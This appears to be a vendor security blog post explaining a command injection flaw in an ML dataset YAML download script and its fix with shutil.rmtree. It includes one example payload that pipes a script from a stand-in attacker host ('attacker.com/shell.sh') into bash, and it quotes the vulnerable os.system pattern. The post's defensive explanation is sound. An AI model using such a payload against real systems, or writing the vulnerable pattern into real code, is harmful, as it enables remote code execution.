Back to Blog
critical SEVERITY8 min read

How command injection happens in Python os.system() and how to fix it

A critical command injection vulnerability was discovered in the `data/xView.yaml` dataset download script, where `os.system(f'rm -rf {labels}')` constructed a shell command using an f-string with a path derived from user-controlled YAML configuration. An attacker supplying a crafted dataset YAML file could embed shell metacharacters in the path to execute arbitrary commands. The fix replaces the shell invocation entirely with Python's `shutil.rmtree()`, eliminating the attack surface by never i

O
By Orbis AppSec
Published June 9, 2026Reviewed June 9, 2026

Answer Summary

This is a command injection vulnerability (CWE-78) in Python, found in `data/xView.yaml` at line 102. The vulnerable pattern `os.system(f'rm -rf {labels}')` passes a user-influenced path directly into a shell command via an f-string, allowing shell metacharacters to execute arbitrary commands. The fix replaces `os.system()` with `shutil.rmtree()` and `labels.unlink()`, which are pure Python filesystem operations that never invoke a shell and therefore cannot be exploited via shell metacharacter injection.

Vulnerability at a Glance

cweCWE-78
fixReplaced os.system() shell invocation with shutil.rmtree() and Path.unlink(), eliminating shell interpretation entirely
riskArbitrary command execution on the host machine when processing attacker-controlled YAML dataset configuration
languagePython
root causeUser-influenced path variable interpolated directly into an os.system() shell command via an f-string without sanitization
vulnerabilityOS Command Injection via f-string in os.system()

How command injection happens in Python os.system() and how to fix it

Summary

A critical command injection vulnerability was found in the data/xView.yaml dataset download script used by a machine learning pipeline. The culprit: a single line — os.system(f'rm -rf {labels}') — that handed a user-influenced filesystem path directly to the shell. An attacker who controls the YAML configuration file could inject shell metacharacters into the labels path and achieve arbitrary command execution on the host machine. The fix is clean and decisive: throw out the shell call entirely and use Python's native filesystem APIs instead.


Introduction

The data/xView.yaml file defines how the xView aerial imagery dataset is downloaded and prepared for training. Buried inside its embedded Python download script, at line 102, was this line:

os.system(f'rm -rf {labels}')

The labels variable is a pathlib.Path object constructed from a base path that originates in the YAML configuration itself:

labels = Path(path / 'labels' / 'train')

Because path is derived from user-supplied or user-modifiable configuration, an attacker who can influence the YAML file can influence labels — and therefore influence the shell command that gets executed. This is the textbook definition of OS command injection (CWE-78), and it carries a critical severity rating because exploitation requires only the ability to supply a crafted dataset YAML file, which is a completely normal and expected operation when training on custom datasets.


The Vulnerability Explained

What went wrong

Python's os.system() passes its argument to the system shell (/bin/sh on Unix). When you use an f-string to build that argument, you're constructing a shell command string — and the shell will interpret every metacharacter in that string.

The vulnerable line:

os.system(f'rm -rf {labels}')

If labels evaluates to /path/to/project/labels/train, this becomes:

rm -rf /path/to/project/labels/train

Perfectly harmless. But if an attacker controls the base path and sets it to something like:

/tmp/labels; curl http://attacker.com/shell.sh | bash

The resulting shell command becomes:

rm -rf /tmp/labels; curl http://attacker.com/shell.sh | bash

The shell executes both commands. The ; metacharacter acts as a command separator, and the attacker's payload runs with the same privileges as the Python process.

Realistic attack scenarios

Scenario 1 — Malicious dataset distribution:
An attacker publishes a modified xView.yaml (or a custom dataset YAML that follows the same pattern) on a public repository or model hub. A researcher downloads it and runs the training pipeline. The download script executes, and the injected command runs silently alongside the legitimate rm -rf.

Scenario 2 — Supply chain attack:
In a CI/CD pipeline that automatically fetches dataset configurations, a compromised upstream YAML file triggers command execution on the build server, potentially exfiltrating secrets or installing backdoors.

Scenario 3 — Local privilege escalation:
In a shared compute environment (e.g., a university GPU cluster), a user places a crafted YAML in a shared directory. Another user with higher privileges runs training, and the injected command executes under their account.

Why f-strings make this worse

An f-string gives the appearance of clean, readable code — there's no obvious string concatenation that might trigger a code reviewer's instinct. But f'rm -rf {labels}' is functionally identical to 'rm -rf ' + str(labels) from the shell's perspective. Both produce a single string that the shell will parse and execute in full, metacharacters and all.


The Fix

The fix is elegant because it doesn't try to sanitize the input — it eliminates the shell entirely.

Before (vulnerable)

import os
from pathlib import Path

# ...

labels = Path(path / 'labels' / 'train')
os.system(f'rm -rf {labels}')
labels.mkdir(parents=True, exist_ok=True)

After (fixed)

import shutil
from pathlib import Path

# ...

labels = Path(path / 'labels' / 'train')
if labels.is_symlink() or labels.is_file():
    labels.unlink()
else:
    shutil.rmtree(labels, ignore_errors=True)
labels.mkdir(parents=True, exist_ok=True)

Why this fix works

1. No shell is ever invoked.
shutil.rmtree() and Path.unlink() are pure Python functions that make direct system calls. There is no shell process, no shell parsing, and therefore no opportunity for shell metacharacter injection. It doesn't matter what characters are in labels — they're treated as a literal filesystem path, not as a shell command string.

2. The import os is replaced with import shutil.
This is a meaningful signal: the fix doesn't just patch the dangerous call — it removes the dependency that enabled it. os.system() is no longer available in this script's namespace.

3. Symlink and file edge cases are handled explicitly.
The fix distinguishes between symlinks/files (labels.unlink()) and directories (shutil.rmtree()). The original rm -rf handled both implicitly via the shell. The explicit Python version is actually more correct and more readable.

4. ignore_errors=True preserves the original intent.
The original rm -rf silently succeeds even if the path doesn't exist. shutil.rmtree(labels, ignore_errors=True) matches that behavior without swallowing unexpected errors in a way that masks bugs.


Prevention & Best Practices

Never use os.system() with dynamic input

os.system() should be treated as a code smell in modern Python. It offers no argument separation, no output capture, and no protection against injection. The Python docs themselves recommend subprocess as a replacement — but even subprocess is dangerous with shell=True.

Pattern Safe? Notes
os.system(f'rm -rf {path}') Shell injection, no output capture
subprocess.run(f'rm -rf {path}', shell=True) Same shell injection risk
subprocess.run(['rm', '-rf', str(path)]) No shell, args passed directly
shutil.rmtree(path) Best: no subprocess at all

Prefer native Python filesystem APIs

For filesystem operations, Python's standard library almost always has a safe equivalent:

# Instead of: os.system('rm -rf /some/path')
shutil.rmtree('/some/path', ignore_errors=True)

# Instead of: os.system('cp src dst')
shutil.copy2(src, dst)

# Instead of: os.system('mkdir -p /some/path')
Path('/some/path').mkdir(parents=True, exist_ok=True)

# Instead of: os.system('mv src dst')
Path(src).rename(dst)

Use shlex.quote() as a last resort

If you absolutely must pass a path to a shell command, use shlex.quote() to escape it:

import shlex
import subprocess

# If you truly cannot avoid a shell call:
safe_path = shlex.quote(str(labels))
subprocess.run(f'some-tool --input {safe_path}', shell=True, check=True)

shlex.quote() wraps the string in single quotes and escapes any internal single quotes, preventing shell interpretation. But this should be a last resort — the preferred solution is always to avoid the shell entirely.

Audit YAML-embedded scripts

Dataset configuration files that embed executable Python scripts (a pattern used by several ML frameworks) deserve special security scrutiny. Any path, URL, or string value that flows from YAML configuration into a shell command is a potential injection point. When reviewing such files, trace every variable that touches os.system(), subprocess, or eval().

Relevant standards

  • CWE-78: Improper Neutralization of Special Elements used in an OS Command
  • OWASP A03:2021: Injection — command injection is explicitly covered
  • OWASP Command Injection Defense Cheat Sheet: recommends avoiding shell calls and using language-native APIs

Key Takeaways

  • os.system() with an f-string is always dangerous when the interpolated value is user-influenced — in this case, the labels path in xView.yaml was directly derived from YAML configuration that any user can modify.
  • The labels variable in the download script was the taint source — it flowed from YAML path configuration into os.system() without any sanitization or quoting.
  • Replacing os.system() with shutil.rmtree() is not just a patch — it's a structural fix that makes injection impossible by design, regardless of what the path contains.
  • YAML files that embed executable scripts are an underappreciated attack surface in ML pipelines; every dynamic value that reaches a shell call must be treated as potentially attacker-controlled.
  • shutil.rmtree() with ignore_errors=True is a drop-in behavioral replacement for rm -rf that requires zero shell involvement and handles the symlink/file/directory distinction correctly.

How Orbis AppSec Detected This

  • Source: The path variable derived from YAML dataset configuration in data/xView.yaml, which flows into labels = Path(path / 'labels' / 'train')
  • Sink: os.system(f'rm -rf {labels}') at data/xView.yaml:102 — a shell-invoking function receiving an f-string built from the tainted labels variable
  • Missing control: No shell escaping (e.g., shlex.quote()), no input validation, and no use of shell-free filesystem APIs before the value reached os.system()
  • CWE: CWE-78 — Improper Neutralization of Special Elements used in an OS Command ("OS Command Injection")
  • Fix: Replaced os.system(f'rm -rf {labels}') with shutil.rmtree(labels, ignore_errors=True) and labels.unlink(), removing the shell invocation entirely

Orbis AppSec automatically detected this vulnerability and opened a pull request with the fix. Try Orbis AppSec on your repositories to find and fix issues like this automatically.


Conclusion

A single line — os.system(f'rm -rf {labels}') — was enough to introduce a critical command injection vulnerability into an ML dataset pipeline. The root cause isn't exotic: it's the combination of a shell-invoking function and an f-string built from user-influenced data, a pattern that appears frequently in data science and ML codebases where shell commands are used as quick shortcuts for filesystem operations.

The fix demonstrates the right mental model: when you need to delete a directory in Python, reach for shutil.rmtree(), not os.system('rm -rf ...'). The Python standard library has safe, shell-free equivalents for virtually every common filesystem operation. Using them doesn't just fix a vulnerability — it makes the entire class of shell injection attacks structurally impossible in that code path.

If you maintain ML pipelines that use YAML-embedded download scripts, this is a good moment to audit every call to os.system(), subprocess.run(..., shell=True), and eval() and ask: does any user-controlled value reach this call? If the answer is yes, the shell needs to go.


References

Frequently Asked Questions

What is command injection in Python?

Command injection occurs when user-controlled data is embedded in a shell command string (e.g., via os.system() or subprocess with shell=True) without sanitization, allowing attackers to append shell metacharacters like `;`, `|`, or `&&` to execute arbitrary commands.

How do you prevent command injection in Python?

Avoid os.system() and shell=True entirely. Use Python's built-in filesystem functions like shutil.rmtree(), pathlib.Path.unlink(), or subprocess with a list of arguments (no shell=True) so the shell is never invoked.

What CWE is command injection?

Command injection is CWE-78: Improper Neutralization of Special Elements used in an OS Command ("OS Command Injection").

Is input validation enough to prevent command injection in Python?

Input validation (e.g., allowlisting characters) reduces risk but is fragile and error-prone. The safest approach is to eliminate the shell call entirely using native Python APIs like shutil, which makes injection structurally impossible regardless of input.

Can static analysis detect command injection in Python?

Yes. Tools like Semgrep, Bandit, and multi-agent AI scanners can detect patterns like os.system() with f-strings or string concatenation. Orbis AppSec's scanner flagged this exact pattern in xView.yaml automatically.

View the Security Fix

Check out the pull request that fixed this vulnerability

View PR #13773

Related Articles

critical

How command injection happens in Python subprocess and how to fix it

A critical shell injection vulnerability was discovered in `utils/downloads.py` where `subprocess.check_output` was called with `shell=True` while passing a user-controlled URL parameter. This allowed attackers to inject arbitrary shell commands by embedding metacharacters like `;`, `&&`, or `$(...)` into a URL string. The fix removes `shell=True`, ensuring the URL is passed as a literal argument in a list rather than being interpreted by the shell.

critical

How command injection happens in Java Runtime.exec() and how to fix it

A critical command injection vulnerability was discovered in `page-object/src/main/java/com/iluwatar/pageobject/App.java` where `Runtime.getRuntime().exec()` was used to launch a file using `cmd.exe` with a directly concatenated file path. An attacker who could control the `applicationFile` variable could inject shell metacharacters to execute arbitrary system commands with the privileges of the running Java process. The fix replaces the unsafe `exec()` call with a properly tokenized `ProcessBui

critical

How command injection happens in Go ffmpeg wrappers and how to fix it

A critical command injection vulnerability was discovered in `drivers/local/util.go` where user-influenced file paths were passed directly to `ffmpeg.Input()` without any sanitization. Because many ffmpeg wrapper libraries construct shell command strings under the hood, an attacker could embed shell metacharacters in a file path to execute arbitrary OS commands with server-level privileges. The fix introduces a `sanitizeFilePath()` function that validates paths are absolute, clean, and point to

critical

Critical Shell Injection in autoban.py: How os.system() Opened a Root Shell

A critical shell injection vulnerability in `autoban.py` allowed attackers to execute arbitrary commands as root on OpenWrt routers by crafting malicious connection data containing shell metacharacters. The fix replaces a dangerous `os.system(cmd)` call with `os.fork()` + `os.execvp()`, eliminating shell interpretation entirely. This change ensures that IP addresses extracted from network connections can never be used to inject arbitrary shell commands, even if they contain semicolons, pipes, ba

high

Shell Injection via Unsafe String Concatenation in PaddleOCR Deployment

A high-severity vulnerability was discovered in PaddleOCR's deployment configuration where model download URLs were specified using unencrypted `http://`, exposing users to man-in-the-middle attacks that could allow an attacker to intercept and replace model files with malicious ones. The fix upgrades all model download URLs to use `https://`, ensuring encrypted transmission and integrity of the downloaded files. This change is a critical security baseline for any application that downloads bina

critical

How buffer overflow happens in C LZSS decompression and how to fix it

A high-severity buffer overflow vulnerability was discovered in `user/libprtos/common/lzss.c`, where the LZSS decompression routine failed to validate offset and length values decoded from compressed input before using them as indices into the `text_buf` ring buffer. An attacker supplying crafted compressed data could trigger out-of-bounds reads or writes, potentially leading to memory corruption, information disclosure, or arbitrary code execution. The fix introduces strict bounds validation on